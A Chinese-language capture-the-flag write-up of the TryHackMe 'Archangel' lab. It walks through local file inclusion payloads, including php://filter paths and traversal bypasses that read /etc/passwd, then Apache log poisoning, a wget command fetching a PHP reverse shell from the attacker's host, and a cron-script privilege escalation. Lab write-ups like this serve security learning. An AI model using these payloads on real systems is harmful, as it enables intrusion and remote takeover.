TryHackMe - Archangel靶场
作者:互联网
Archangel
Boot2root, Web exploitation, Privilege escalation, LFI
0x01 信息收集
常规端口扫一波,发现只有22和80端口开放
先从80端口入手,常规的扫目录没有发现有价值的东西
在源代码里发现一个可以的域名
网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag
在用gobuster扫描网站目录,得到test.php和robots.txt
robots.txt里面指的也是test.php
0x02 文件包含
打开test.php看路径像是有文件包含的漏洞
用php伪协议包含到test.php文件
php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
分析源代码if需要满足两个条件没有../..和
/var/www/html/development_testing
根据条件读取/etc/passwd
php://filter/resource=/var/www/html/development_testing/..//..//..//..//..//..//..//..//..//..//..//etc/passwd
也可以用.././.././绕过
..%2f/..%2f/..%2f/也能绕过
尝试包含apache日志getshell
在User-Agent里插入phpinfo函数测试一下
成功解析
0x03 GetShell
插入system执行命令函数
给cmd传参成功执行,接下来就是用kali自带的php反向shell脚本getshell
修改文件的反向链接的地址和端口
用python3搭建一个简单的网站
python3 -m http.server 4444
执行函数用wget 下载脚本 wget http://10.10.220.123:4444/php-serverse-shell.php
下载成功后在同级目录下访问php-reverse-shell.php
访问前记得先用nc起监听
0x04 权限提升
shell过来后准备提权,现先翻一下可以提权的脚本,发现/etc/crontab目录下有helloworld.sh以archanggel用户自动运行的脚本
过去看下是个自动运行的sh文件,具有可读可写权限。在文件后面添加反弹shell的命令。
稍等片刻便能获得archangel权限
标签:文件,Archangel,shell,..,端口,test,靶场,php,TryHackMe 来源: https://blog.csdn.net/qq_44101248/article/details/113957607